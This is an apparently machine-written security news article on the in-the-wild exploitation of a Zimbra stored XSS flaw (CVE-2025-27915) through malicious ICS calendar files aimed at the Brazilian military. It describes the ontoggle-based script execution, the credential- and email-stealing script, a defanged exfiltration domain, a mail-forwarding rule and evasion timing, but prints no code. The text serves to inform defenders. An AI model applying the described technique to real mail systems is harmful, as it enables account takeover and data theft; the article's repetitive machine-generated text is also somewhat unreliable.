Ethical Hacking News
A recent zero-day vulnerability in Zimbra Collaboration has been exploited by unknown threat actors targeting the Brazilian military, according to a report published by StrikeReady Labs on September 30, 2025. The vulnerability allows attackers to execute arbitrary code within the victim's session, potentially leading to unauthorized actions such as email redirection and data exfiltration.
The incident highlights the ongoing threat landscape of zero-day vulnerabilities in widely used software solutions and underscores the need for robust security measures, regular software updates, and increased awareness about patching vulnerabilities to protect against sophisticated attacks.
The Brazilian military was targeted by unknown threat actors exploiting a zero-day vulnerability in Zimbra Collaboration. The vulnerability, CVE-2025-27915, is a stored cross-site scripting (XSS) vulnerability that allows arbitrary code execution. Attacks used malicious ICS files to execute JavaScript and perform unauthorized actions on the victim's account. The vulnerability was patched by Zimbra in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 released on January 27, 2025. Unknown threat actors exploited the flaw to steal credentials and email data, using a custom-built data stealer script. The attack highlights the ongoing threat landscape of zero-day vulnerabilities in widely used software solutions.
A recently discovered zero-day vulnerability in Zimbra Collaboration has been exploited by unknown threat actors targeting the Brazilian military, according to a report published by StrikeReady Labs on September 30, 2025. The vulnerability, tracked as CVE-2025-27915 (CVSS score: 5.4), is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files, resulting in arbitrary code execution.
When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a tag. This allows an attacker to run arbitrary JavaScript within the victim's session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim's account, including e-mail redirection and data exfiltration.
The vulnerability was addressed by Zimbra as part of versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 released on January 27, 2025. However, a report published by StrikeReady Labs reveals that the observed in-the-wild activity involved unknown threat actors spoofing the Libyan Navy's Office of Protocol to target the Brazilian military using malicious ICS files that exploited the flaw.
The ICS file contained a JavaScript code designed to act as a comprehensive data stealer to siphon credentials, emails, contacts, and shared folders to an external server ("ffrk[.]net"). It also searches for emails in a specific folder, and adds malicious Zimbra email filter rules with the name "Correo" to forward the messages to spam_to_junk@proton.me. As a way to avoid detection, the script is fashioned such that it hides certain user interface elements and detonates only if more than three days have passed since the last time it was executed.
It's currently not clear who is behind the attack, but earlier this year, ESET revealed that the Russian threat actor known as APT28 had exploited XSS vulnerabilities in various webmail solutions from Roundcube, Horde, MDaemon, and Zimbra to obtain unauthorized access. A similar modus operandi has also been adopted by other hacking groups like Winter Vivern and UNC1151 (aka Ghostwriter) to facilitate credential theft.
The recent incident highlights the ongoing threat landscape of zero-day vulnerabilities in widely used software solutions. The exploitation of this vulnerability demonstrates the potential for attackers to target organizations with sophisticated phishing campaigns, leveraging the power of social engineering tactics to bypass security controls.
In response to this vulnerability, it is essential for organizations using Zimbra Collaboration to ensure they have implemented appropriate measures to patch their systems and protect against such attacks. This includes regular software updates, secure configuration practices, and robust monitoring of network traffic to detect potential malicious activity.
Furthermore, the incident underscores the need for increased awareness about the importance of keeping software up-to-date and applying security patches in a timely manner. As new vulnerabilities are discovered and reported, it is crucial for organizations to stay informed and adapt their security strategies accordingly.
In conclusion, the exploitation of this Zimbra Collaboration zero-day vulnerability by unknown threat actors targeting the Brazilian military serves as a stark reminder of the ongoing threat landscape in the cybersecurity world. It highlights the need for robust security measures, regular software updates, and increased awareness about the importance of patching vulnerabilities to protect against sophisticated attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Zimbra-Collaboration-Zero-Day-Exploited-to-Target-Brazilian-Military-via-Malicious-ICS-Files-ehn.shtml
https://thehackernews.com/2025/10/zimbra-zero-day-exploited-to-target.html
https://nvd.nist.gov/vuln/detail/CVE-2025-27915
https://www.cvedetails.com/cve/CVE-2025-27915/
Published: Mon Oct 6 13:30:37 2025 by llama3.2 3B Q4_K_M
